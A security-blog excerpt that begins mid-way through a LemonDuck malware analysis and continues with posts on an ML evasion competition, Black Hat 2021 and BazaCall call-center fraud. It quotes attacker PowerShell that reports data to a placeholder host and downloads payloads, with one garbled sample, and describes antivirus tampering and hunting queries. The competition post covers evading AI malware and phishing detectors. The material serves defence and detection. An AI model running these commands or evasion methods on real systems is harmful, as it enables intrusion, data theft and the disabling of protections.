Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.

The attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, Redis, and Hadoop YARN services on Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001, 8088, 16379, 6379, 22, 445, and 1433.

Other functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:

(New-object net.webclient).downloadstring("DOWN_URL/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)
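Defenders reviewing proxy logs can recover the contact, sent, and received counts from such beacon URLs. The following Python sketch is a hypothetical helper (the function name and example URL are illustrative, not from the original report):

```python
from urllib.parse import urlparse, parse_qs

def parse_mail_beacon(url: str) -> dict:
    """Extract the mail-spreading counters from a LemonDuck-style report URL."""
    q = parse_qs(urlparse(url).query)
    return {
        "type": q.get("type", [""])[0],
        "user": q.get("u", [""])[0],
        "contacts": int(q.get("c1", ["0"])[0]),   # mailbox contacts found
        "sent": int(q.get("c2", ["0"])[0]),       # messages sent
        "received": int(q.get("c3", ["0"])[0]),   # senders harvested
    }

beacon = "http://example.invalid/report.json?type=mail&u=alice&c1=120&c2=45&c3=60"
print(parse_mail_beacon(beacon))
```

Aggregating these counters across hosts gives a rough measure of how far the self-spreading component reached inside an environment.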

Competition removal and host patching

At installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via KR.Bin, the “Killer” script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

This “Killer” script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant KR.Bin. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called “blackball”, “blutea”, or “rtsa”, which has been in use by all LemonDuck’s infrastructures for the last year along with other task names.

The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, hosted on their own infrastructure, to ensure other attackers don’t gain web shell access the way they had. If unmonitored, this patching could lead responders to assume a system was never vulnerable and to dismiss suspicious activity that occurred before patching as unrelated to the vulnerability.

Weaponization and continued impact

A miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the Phorpiex botnet, and other malware operators. The file uses any of the following names:

  • M6.bin
  • M6.bin.ori
  • M6G.bin
  • M6.bin.exe
  • File names matching the regex pattern M[0-9]{1}[A-Z]{1}.BIN

Once the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as the following (decoded):

cmd.EXE /c "set A=power& call %A%shell -ep bypass -e $Lemon_Duck='MicroSoft\Windows\FtLSO\nKOlou';$y='';$z=$y+'p'+'?ipc_ "';$m=(New-Object System.Net.WebClient).DownloadData($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'Øœì
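The encoded variants of these check-ins use PowerShell's -e/-EncodedCommand flag, which takes Base64 over UTF-16LE text, so captured command lines can be decoded offline. A minimal Python sketch:

```python
import base64

def decode_powershell_e(b64: str) -> str:
    """Decode the argument of PowerShell's -e/-EncodedCommand flag
    (Base64 over UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")

# Round-trip demonstration with a benign command.
encoded = base64.b64encode("Write-Output hi".encode("utf-16-le")).decode()
print(decode_powershell_e(encoded))  # Write-Output hi
```

Decoding these arguments in bulk from process creation logs is often the fastest way to see what a suspicious `powershell.exe -e ...` invocation actually does.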


Affected systems also bring in secondary payloads such as Ramnit, a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a “simple” infection by coin mining malware like LemonDuck can persist and bring more dangerous threats into the enterprise.

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.


Apply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.

  • Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. Learn about stopping threats from USB devices and other removable media.
  • Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.
  • Turn on PUA protection. Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protection to block connections to malicious domains and IP addresses.
  • Check your Office 365 antispam policy and your mail flow rules for allowed senders, domains, and IP addresses. Apply extra caution when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations; Office 365 will honor these settings and can let potentially harmful messages pass through. Review system overrides in Threat Explorer to determine why attack messages have reached recipient mailboxes.

Attack surface reduction

Turn on the following attack surface reduction rules to block or audit activity associated with this threat:

Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

  • TrojanDownloader:PowerShell/LemonDuck!MSR
  • TrojanDownloader:Linux/LemonDuck.G!MSR
  • Trojan:Win32/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.B
  • Trojan:PowerShell/LemonDuck.C
  • Trojan:PowerShell/LemonDuck.D
  • Trojan:PowerShell/LemonDuck.E
  • Trojan:PowerShell/LemonDuck.F
  • Trojan:PowerShell/LemonDuck.G
  • TrojanDownloader:PowerShell/LodPey.A
  • TrojanDownloader:PowerShell/LodPey.B
  • Trojan:PowerShell/Amynex.A
  • Trojan:Win32/Amynex.A

Endpoint detection and response (EDR) alerts

Alerts with the following titles in the security center can indicate threat activity on your network:

  • LemonDuck botnet C2 domain activity
  • LemonDuck malware

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Suspicious PowerShell command line
  • Suspicious remote activity
  • Suspicious service registration
  • Suspicious Security Software Discovery
  • Suspicious System Network Configuration Discovery
  • Suspicious sequence of exploration activities
  • Suspicious Process Discovery
  • Suspicious System Owner/User Discovery
  • Suspicious System Network Connections Discovery
  • Suspicious Task Scheduler activity
  • Suspicious Microsoft Defender Antivirus exclusion
  • Suspicious behavior by cmd.exe was observed
  • Suspicious remote PowerShell execution
  • Suspicious behavior by svchost.exe was observed
  • A WMI event filter was bound to a suspicious event consumer
  • Attempt to hide use of dual-purpose tool
  • System executable renamed and launched
  • Microsoft Defender Antivirus protection turned off
  • Anomaly detected in ASEP registry
  • A script with suspicious content was observed
  • An obfuscated command line sequence was identified
  • A process was injected with potentially malicious code
  • A malicious PowerShell Cmdlet was invoked on the machine
  • Suspected credential theft activity
  • Outbound connection to non-standard port
  • Sensitive credential memory read

Advanced hunting

The LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.

NOTE: The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data and locate potential LemonDuck-related indicators in your network, go to the Advanced hunting page > Query tab and use the calendar drop-down menu to update your query to hunt over the last 30 days.

LemonDuck template subject lines

Looks for subject lines, present from 2020 to 2021, in dropped scripts that attach malicious LemonDuck samples to emails and mail them to contacts of the mailboxes on impacted machines. Additionally, it checks whether attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP, or .JS, though these could change, as could the subjects themselves. Run query in Microsoft 365 security center.

| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1

LemonDuck Botnet Registration Functions

Looks for instances of function runs with the name “SIEX”, which the LemonDuck initializing scripts use to assign a specific user agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. Run query in Microsoft 365 security center.

| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"

LemonDuck keyword identification

Looks for simple usage of LemonDuck keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_any("Lemon_Duck","LemonDuck")

LemonDuck Microsoft Defender tampering

Looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. Run query in Microsoft 365 security center.

| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp

Antivirus uninstallation attempts

Looks for command line events where LemonDuck or other similar malware uses WMIC.exe to silently uninstall antivirus products by name, such as ESET, Kaspersky, Avast, and Norton Security, as well as any product with “Security” or “AntiVirus” in its name. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName =~ "wmic.exe"
| where InitiatingProcessCommandLine has_all("product where","name like","call uninstall","/nointeractive")
| where InitiatingProcessCommandLine has_any("Kaspersky","avast","avp","security","eset","AntiVirus","Norton Security")

Known LemonDuck component script installations

Looks for instances of the callback actions that attempt to obfuscate detection while downloading supporting scripts, such as those that enable the “Killer” and “Infection” functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances are included to account for environments with potential false positives. The most general versions are intended to account for minor script or component changes, such as switching away from .bin files or using non-common components. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName in ("powershell.exe","cmd.exe")
| where InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash",".bin") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash","kr.bin","if.bin","m6.bin")

LemonDuck named scheduled task creation

Looks for instances where LemonDuck creates statically named scheduled tasks or follows a semi-unique pattern of task creation. LemonDuck also launches hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: “schtasks.exe” /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\2IVLzNXfZV/F /tr “powershell -w hidden -c PS_CMD”. Run query in Microsoft 365 security center.

| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has("/create")
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c PS_CMD")

Competition killer script scheduled task execution

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. Run query in Microsoft 365 security center.

| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
| where DeleteVolume >= 40 and DeleteVolume <= 80
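The counting logic of this query can be prototyped offline against exported process events. The following Python sketch is an assumption-laden analogue of the KQL (not the query itself); it collects distinct "schtasks.exe /Delete" command lines per device and flags devices where known competitor markers appear and the distinct count falls in the 40-80 band:

```python
from collections import defaultdict

def flag_killer_script_devices(events, markers=("Mysa", "Sorry", "Oracle Java Update", "ok")):
    """events: iterable of (device_id, process_command_line) pairs."""
    per_device = defaultdict(set)
    for device_id, cmdline in events:
        # Mirror has_all("schtasks.exe","/Delete","/TN","/F")
        if all(tok in cmdline for tok in ("schtasks.exe", "/Delete", "/TN", "/F")):
            per_device[device_id].add(cmdline)
    flagged = []
    for device_id, cmds in per_device.items():
        blob = " ".join(cmds)  # mirror has_any over the set of command lines
        if any(m in blob for m in markers) and 40 <= len(cmds) <= 80:
            flagged.append(device_id)
    return flagged

# Synthetic example: one device deleting 45 competitor tasks, including "Mysa".
events = [("deviceA", f'schtasks.exe /Delete /TN "Mysa{i}" /F') for i in range(45)]
print(flag_killer_script_devices(events))  # ['deviceA']
```

Tuning the 40-80 band here is directly analogous to adjusting the DeleteVolume bounds in the query above.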

LemonDuck hosts file adjustment for dynamic C2 downloads

Looks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")


Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.


The post When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks appeared first on Microsoft Security Blog.

Attack AI systems in Machine Learning Evasion Competition

July 29th, 2021 No comments

Today, we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC) for the AI and security communities to exercise their muscle to attack critical AI systems in a realistic setting. Hosted and sponsored by Microsoft, alongside NVIDIA, CUJO AI, VM-Ray, and MRG Effitas, the competition rewards participants who efficiently evade AI-based malware detectors and AI-based phishing detectors.

Machine learning powers critical applications in virtually every industry: finance, healthcare, infrastructure, and cybersecurity. Microsoft is seeing an uptick of attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. Publicly known cases documented by MITRE’s ATLAS framework show how, with the proliferation of AI systems, comes the increased risk that the machine learning powering these systems can be manipulated to achieve an adversary’s goals. While the risks are inherent in all deployed machine learning models, the threat is especially explicit in cybersecurity, where machine learning models are increasingly relied on to detect threat actors’ tools and behaviors. Market surveys have consistently indicated that the security and privacy of AI systems are top concerns for executives. According to CCS Insight’s survey of 700 senior IT leaders in 2020, security is now the biggest hurdle companies face with AI, cited by over 30 percent of respondents1.

However, security practitioners are unaware of how to clear this new hurdle. A recent Microsoft survey found that 25 out of 28 organizations did not have the right tools in place to secure their AI systems. While academic researchers have been studying how to attack AI systems for close to two decades, awareness among practitioners is low. That is why one recommendation for business leaders from the 2021 Gartner report Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework2 is that organizations “Drive staff awareness across the organization by leading a formal AI risk education campaign.”

It is critical to democratize the knowledge to secure AI systems. That is why Microsoft recently released Counterfit, a tool born out of our own need to assess Microsoft’s AI systems for vulnerabilities with the goal of proactively securing AI services. For those new to adversarial machine learning, NVIDIA released MINTNV, a hack-the-box style environment to explore and build their skills.

Participate in MLSEC.IO

With the launch today of MLSEC.IO, we aim to highlight how security models can be evaded by motivated attackers and allow practitioners to exercise their muscles attacking critical machine learning systems used in cybersecurity.

“There is a lack of practical knowledge about securing or attacking AI systems in the security community. Competitions like Microsoft’s MLSEC democratize adversarial machine learning knowledge for the offensive and defensive security communities, as well as the machine learning community. MLSEC’s hands-on approach is an exciting entry point into AML.”—Christopher Cottrell, AI Red Team Lead, NVIDIA

The competition involves two challenges beginning on August 6 and ending on September 17, 2021: an Anti-Malware Evasion track and an Anti-Phishing Evasion track.

  1. Anti-Phishing Evasion Track: Machine learning is routinely used to detect a highly successful attacker technique for gaining initial access via phishing. In this track, contestants play the role of an attacker and attempt to evade a suite of anti-phishing models. Custom built by CUJO AI, the phishing machine learning models are purpose-built for this competition only.
  2. Anti-Malware Evasion track: This challenge provides an alternative scenario for attackers wishing to bypass machine-learning-based antivirus: change an existing malicious binary in a way that disguises it from the antimalware model.

In addition, for each of the Attacker Challenge tracks, the highest-scoring submission that extends and leverages Counterfit, Microsoft’s open-source tool for investigating the security of machine learning models, will be awarded a bonus prize.

“The security evasion challenge creates new pathways into cybersecurity and opens up access for a broader base of talent. This year, to lower barriers to entry, we are introducing the phishing challenge, while still strongly encouraging people without significant experience in malware to participate.”—Zoltan Balazs, Head of Vulnerability Research Lab at CUJO AI and cofounder of the competition.

Key details about the competition

  • The competition runs from August 6 to September 17, 2021. Registration will remain open throughout the duration of the competition.
  • Winners will be announced on October 27, 2021, and contacted via email.
  • Prizes for first place, honorable mentions, as well as a bonus prize will be awarded for each of the two tracks.

Learn More

To learn more about the 2021 Machine Learning Security Evasion Competition:

  • Register now to begin participating on August 6, 2021, to exercise your offensive security muscle.
  • Visit the Counterfit GitHub Repository to learn more about Counterfit.
  • If you are new to adversarial machine learning, practice attacking AI systems via NVIDIA’s MINTNV hack-the-box style challenge.

This competition is part of broader efforts at Microsoft to empower engineers to securely develop and deploy AI systems. We recommend using it alongside the following resources:

  • For security analysts to orient to threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK style AdvML Threat Matrix complete with case studies of attacks on production machine learning systems.
  • For security incident responders, we released our own bug bar to systematically triage attacks on machine learning systems.
  • For developers, we released threat modeling guidance specifically for machine learning systems.
  • For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.

Register now to participate in the Machine Learning Security Evasion Competition that begins on August 6 and ends on September 17, 2021. Winners will be announced on October 27, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1CCS Insight, Senior Leadership IT Investment Survey, Nick McQuire et al., 18 August 2020.

2Gartner, Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework, Avivah Litan, et al., 15 January 2021.

The post Attack AI systems in Machine Learning Evasion Competition appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more

July 29th, 2021 No comments

Black Hat USA 2021 is about understanding the needs of security professionals and meeting you where you are. With last year’s pandemic-related firefighting still fresh in our minds, this year’s event will provide a welcome respite to learn about cutting-edge security solutions, build our skillsets, and network with peers.

Microsoft Security is committed to helping you secure your entire digital estate with integrated, comprehensive protection—bridging the gaps to catch what others miss. We provide the leading AI, automation, and expertise that help you detect threats quickly, respond effectively, and fortify your security posture.​ As the world enters a new normal where seasoned security professionals are more needed than ever, we’re proud to share our experience and learn from you at the virtual Black Hat USA 2021.

Virtual Microsoft-sponsored sessions

The Emerging Cyber Threat Landscape

Date and time: Tuesday, August 3, 1:15 PM – 1:45 PM PT

Black Hat CISO summit virtual breakout


  • Ann Johnson, Corporate Vice President, Security, Compliance, and Identity Business Development, Microsoft

The rapid rise of ransomware can be traced to WannaCry and (Not)Petya, which fused large-scale compromise techniques with an encryption payload that demanded a ransom payment in exchange for the decryption key. These successful attacks inspired a new generation of human-operated ransomware, expanding into an enterprise-scale operation blending targeted attacks and extortion. Learn how the rise in ransomware is influencing cyber strategies that can help strengthen your security posture.

Evolving Red Teaming at Microsoft

Date and time: Wednesday, August 4, 8 AM to 8:15 AM PT

Track: Security Operations and Incident Response


  • Alexandre Fernandes Costa, Principal Security Engineer Lead
  • Reid Borsuk, Principal Security Engineer

Representatives from one of the six teams dedicated to offensive security at Microsoft share how we’ve evolved from red teaming to broader offensive security practices and techniques. They’ll walk you through our collaborative approach to offensive security operations, all while demonstrating how red team activity is reflected in our products designed to stop adversaries in their tracks.

Preventing a Hostage Situation: Defusing the Pervasive Threat of Human-Operated Ransomware

Date and time: Wednesday, August 4, 3:10 PM – 3:30 PM PT

Track: Endpoint Security


  • Hadar Feldman, Product Management Lead, Microsoft 365 Defender
  • Itai Kollmann Dekel, Principal Research Manager, Microsoft Defender for Endpoint

Ransomware has evolved. We’ve all seen it progress from automated, indiscriminate nuisance attacks into the targeted, human-operated campaigns that cost businesses millions. Protecting against a ransomware attack is like preventing a hostage situation in real life—you need to understand the nature of the threat, assess your exposure to risk, identify high-value assets, implement protective measures, and have playbooks ready to respond rapidly.

In this session, we’ll take you through crisis prevention and mitigation strategies that can be a game-changer against human-operated ransomware. You’ll learn about our latest research on the ransomware threat landscape, based on in-depth analysis of dozens of real-world ransomware attacks in the past year. We’ll examine how human-operated ransomware attacks have become more like advanced persistent threats, and what that means for your organization. We’ll discuss key mitigations that address common techniques observed in ransomware campaigns (like tampering with security products). Finally, we’ll examine approaches to contain aggressive ransomware along with critical ways to improve your ability to see through the noise—before it’s too late.

Inside the Most Impactful Nation-State Attack in History

Date and time: Thursday, August 5, 2:10 PM – 2:30 PM PT

Track: Security Operations and Incident Response


  • Elia Florio, Principal Research Lead, Microsoft
  • Ramin Nafisi, Senior Malware Reverse Engineer, Microsoft
  • Dana Baril, Senior Security Research Lead, Microsoft
  • Michael Grenetz, Senior Product Manager, Microsoft

Get an inside look into one of the most sophisticated attacks in history—the Nobelium incident—from the frontline responders that helped track and defend against it. We’ll discuss the adversary’s tradecraft, novel techniques, and expert recommendations that can help organizations protect themselves from the next wave of advanced threats.

Microsoft Bug Bounty Program

Microsoft awarded $13.6 million in bug bounties to more than 340 security researchers in 58 countries during the past 12 months. Bounties averaged more than $10,000 per award across all programs, with the largest ($200,000) awarded under the Hyper-V Bounty Program. The more than 1,200 eligible reports we received over the past year reflect the talent of the global security research community, as well as the spirit of partnership Microsoft fosters in addressing the challenges of a rapidly evolving threat landscape.

Bug bounty and research programs—new and updated

A heartfelt thank you goes out to everyone who shared their research with Microsoft over the past year. We look forward to sharing more Bug Bounty Program improvements with you in the coming year, as we continue to invest in our partnerships within the security research community.

Machine Learning Evasion Competition

Microsoft is seeing an uptick in attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. To help the AI and security community ramp up in this novel space and provide a learning environment, today we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC). Learn more about the competition and how to participate in our announcement blog.

Microsoft Security product news

Microsoft Azure Sentinel

In March 2021, Microsoft announced an important step in realizing our vision for integrated SIEM and XDR with the release of incidents integration between Azure Sentinel and Microsoft 365 Defender. Now, we’re excited to take another key step in this journey—bi-directional incident syncing between Azure Defender and Azure Sentinel is now in public preview. With this capability, users can automatically sync alerts, incidents, and incident statuses across the two products. Microsoft now delivers the only integrated SIEM and XDR with incident sharing across all components, streamlining the investigation process and giving your SecOps team more time to focus on what’s really important. Read Microsoft Ignite 2021: What’s New in Azure Sentinel to learn more.

Microsoft Defender for Endpoint

Today’s threat environment is complex, and the endpoint continues to be a top attack vector. We recently released improvements and updates to the evaluation lab in Microsoft Defender for Endpoint to include new simulations by SafeBreach for attack campaigns such as Solorigate and Carbanak+FIN7, enabling security teams to better prepare for these types of advanced threats.

Robust prevention is a necessary first step in securing your organization. For that reason, we’re excited to share new device control capabilities for USB printing and removable storage to help organizations add additional layers of protection to their endpoints. We’ve also been extending our preventative capabilities across platforms, and the general availability of threat and vulnerability management for Linux adds to our existing support for macOS and Windows.

Finally, when responding to a potential threat, time is of the essence; so, we’ve focused on enabling security teams to scale their capabilities for more rapid investigations and response. Giving security teams the ability to download quarantined files without getting the user involved can dramatically speed up an investigation. In addition, our new live response API enables forensic evidence to be gathered as soon as suspicious activity is identified on a device.

Microsoft Azure Defender for IoT

Azure Defender for IoT is an agentless, network-layer monitoring solution for identifying unmanaged IoT and operational technology (OT) assets, prioritizing vulnerability mitigations, and continuously monitoring for threats using IoT/OT-aware behavioral analytics. Available for either on-premises or cloud-connected environments, Azure Defender for IoT is tightly integrated with Azure Sentinel and supports third-party security operation center (SOC) tools such as Splunk, IBM QRadar, and ServiceNow.

We’re happy to announce that IoT/OT-specific threat intelligence can now be continuously delivered to cloud-connected sensors—reducing manual efforts and helping to ensure constant security. Coming soon: mapping of threats to tactics and techniques from MITRE ATT&CK for industrial control systems (ICS). Plus, be sure to attend our Black Hat session featuring Azure Defender for IoT security researchers describing BadAlloc, the critical RCE vulnerability they uncovered in widely used IoT/OT real-time operating systems (RTOS), libraries, and SDKs.

App governance add-on to Microsoft Cloud App Security

App governance is a new add-on capability to Microsoft Cloud App Security that can be used to monitor, protect, and govern OAuth-enabled third-party apps on the Microsoft 365 platform that use the Microsoft Graph API. The new app governance add-on, now in preview, helps security administrators and analysts quickly identify, alert on, and prevent risky app behaviors from the Microsoft 365 compliance center.

Learn more about the new app governance add-on.

Azure Key Vault Managed hardware security modules (HSM)

Azure Key Vault Managed HSM is a fully managed, highly available, single-tenant, standards-compliant cloud service that enables customers to safeguard cryptographic keys for their cloud applications using FIPS 140-2 Level 3 validated HSMs.

Always Encrypted

Always Encrypted protects sensitive data (such as credit card or social security numbers) stored in Azure SQL Database or SQL Server databases, allowing our customers to encrypt data inside client applications without revealing the encryption keys to the database engine. This means Always Encrypted maintains a secure separation between those who own the data and those who manage it. The general availability of Always Encrypted strengthens our promise that Microsoft Azure offers the broadest support for confidential computing. Along with Azure Confidential Ledger and support for Kubernetes and other confidential containers, Always Encrypted gives our customers the broadest range of options for making their virtual machines (VMs), applications, and services confidential.

Learn more about Microsoft Security solutions

We look forward to joining you at Microsoft virtual booth 2340 for Black Hat 2021, July 31 to August 5, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more appeared first on Microsoft Security Blog.


BazaCall: Phony call centers lead to exfiltration and ransomware

July 29th, 2021

Our continued investigation into BazaCall campaigns, those that use fraudulent call centers that trick unsuspecting users into downloading the BazaLoader malware, shows that this threat is more dangerous than what’s been discussed publicly in other security blogs and covered by the media. Apart from having backdoor capabilities, the BazaLoader payload from these campaigns also gives a remote attacker hands-on-keyboard control on an affected user’s device, which allows for a fast network compromise. In our observation, attacks emanating from the BazaCall threat could move quickly within a network, conduct extensive data exfiltration and credential theft, and distribute ransomware within 48 hours of the initial compromise.

BazaCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. The technique is reminiscent of vishing and tech support scams, where potential victims are cold-called by the attacker; in BazaCall’s case, however, targeted users must dial the number themselves. When they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware on their devices. Thus, BazaCall campaigns require direct phone communication with a human and social engineering tactics to succeed. Moreover, the lack of obvious malicious elements in the delivery methods could render typical ways of detecting spam and phishing emails ineffective.

Figure 1. The flow of a typical BazaCall attack, from the spam email to social engineering to the payload being downloaded and hands-on-keyboard attacks

The use of another human element in BazaCall’s attack chain through the abovementioned hands-on-keyboard control further makes this threat more dangerous and more evasive than traditional, automated malware attacks. BazaCall campaigns highlight the importance of cross-domain optics and the ability to correlate events in building a comprehensive defense against complex threats.

Microsoft 365 Defender orchestrates protection across domains to deliver coordinated defense. In the case of BazaCall, Microsoft Defender for Endpoint detects malware and attacker behavior resulting from the campaign, and these signals inform Microsoft Defender for Office 365 protections against related emails, even if these emails don’t have the typical malicious artifacts. Microsoft threat analysts who constantly monitor BazaCall campaigns enrich the intelligence on this threat and enhance our ability to protect customers.

In this blog post, we discuss how a recent BazaCall campaign attempts to compromise systems and networks through the mentioned human elements and how Microsoft defends against it.

Out with the links and attachments, in with the customer service phone numbers

BazaCall campaigns begin with an email that uses various social engineering lures to trick target recipients into calling a phone number. For example, the email informs users about a supposed expiring trial subscription and that their credit card will soon be automatically charged for the subscription’s premium version. Each wave of emails in the campaign uses a different “theme” of subscription that is supposed to be expiring, such as a photo editing service or a cooking and recipes website membership. In a more recent campaign, the email does away with the subscription trial angle and instead poses as a confirmation receipt for a purchased software license.

Unlike typical spam and phishing emails, BazaCall’s messages do not have a link or attachment in the body that users must click or open. Instead, they instruct users to call a phone number in case they have questions or concerns. This lack of typical malicious elements—links or attachments—adds a level of difficulty in detecting and hunting for these emails. In addition, the email’s messaging might lend it an air of legitimacy if the user has been narrowly trained to avoid typical phishing and malware emails but not taught to be wary of social engineering techniques.

